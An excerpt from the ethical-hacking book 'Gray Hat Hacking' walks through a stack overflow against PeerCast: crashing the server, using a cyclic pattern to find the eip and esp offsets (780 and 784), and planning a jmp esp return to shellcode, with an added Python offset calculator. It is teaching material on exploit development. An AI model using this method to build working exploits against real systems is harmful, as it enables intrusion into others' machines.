
Shon Harris, Allen Harper, Chris Eagle, and Jonathan Ness

"Gray Hat Hacking, Second Edition"

10.10.151 7144
Be sure to remove all hard carriage returns from the ends of each line. Make the
peercast.sh file executable, within your metasploit cygwin shell:
$ chmod 755 ../peercast.sh
Execute the peercast attack script.
$ ../peercast.sh
Gray Hat Hacking: The Ethical Hacker's Handbook
166
As expected, when we run the attack script, our server crashes.
The debugger breaks with the eip set to 0x42306142 and esp is set to 0x61423161.
Using Metasploit's patternOffset.pl tool, we can determine where in the pattern we
overwrote eip and esp.
Determine the Attack Vector
As can be seen in the last step, when the program crashed, the overwritten esp value was
exactly 4 bytes after the overwritten eip. Therefore, if we fill the attack buffer with
780 bytes of junk and then place 4 bytes to overwrite eip, we can then place our shellcode
at this point and have access to it in esp when the program crashes, because the value of
esp matches the value of our buffer at exactly 4 bytes after eip (784). Each exploit is different,
but in this case, all we have to do is find an assembly opcode that says "jmp esp". If we
place the address of that opcode after 780 bytes of junk, the program will continue
executing that opcode when it crashes.
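The offset lookup and the resulting buffer layout described in the two sections above, as an added Python example (not code from the book or from Metasploit): it reimplements the cyclic-pattern generation and the patternOffset.pl search, then runs them on the two register values the crash produced. The function names and the dictionary keys are the example's own.

```python
import string
import struct
from typing import Optional

def pattern_create(length: int) -> bytes:
    """Cyclic pattern in the style of Metasploit's pattern_create: each
    triple is <Upper><lower><digit>, so every 4-byte window is unique in
    the first 26*26*10*3 = 20280 bytes."""
    out = bytearray()
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out += (upper + lower + digit).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out)  # caller asked for more than one full cycle

def pattern_offset(reg_value: int, length: int = 20280) -> Optional[int]:
    """Offset of a 32-bit register value inside the pattern, or None.
    x86 is little-endian, so the value the debugger shows (0x42306142)
    sits in memory as the bytes b"Ba0B"; pack it that way before searching."""
    needle = struct.pack("<I", reg_value)
    idx = pattern_create(length).find(needle)
    return idx if idx != -1 else None

def crash_layout(eip_value: int, esp_value: int) -> dict:
    """Turn the two register values from the crash into the buffer layout
    the text describes: junk up to the eip overwrite, 4 bytes for eip,
    and the offset at which esp points back into the same buffer."""
    eip_off = pattern_offset(eip_value)
    esp_off = pattern_offset(esp_value)
    if eip_off is None or esp_off is None:
        raise ValueError("register value not found in pattern; was the "
                         "full pattern sent, or was the crash unrelated?")
    return {
        "junk": eip_off,                      # bytes before the saved return address
        "eip_offset": eip_off,
        "esp_offset": esp_off,
        "gap_after_eip": esp_off - eip_off - 4,  # 0 => esp lands right after eip
    }

if __name__ == "__main__":
    # Constructed from the register values quoted on this page.
    print(crash_layout(0x42306142, 0x61423161))
    # -> {'junk': 780, 'eip_offset': 780, 'esp_offset': 784, 'gap_after_eip': 0}
```

A gap other than 0 means esp does not point directly after the return address, so the layout in the text would not apply and the offsets must be read from the output instead.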

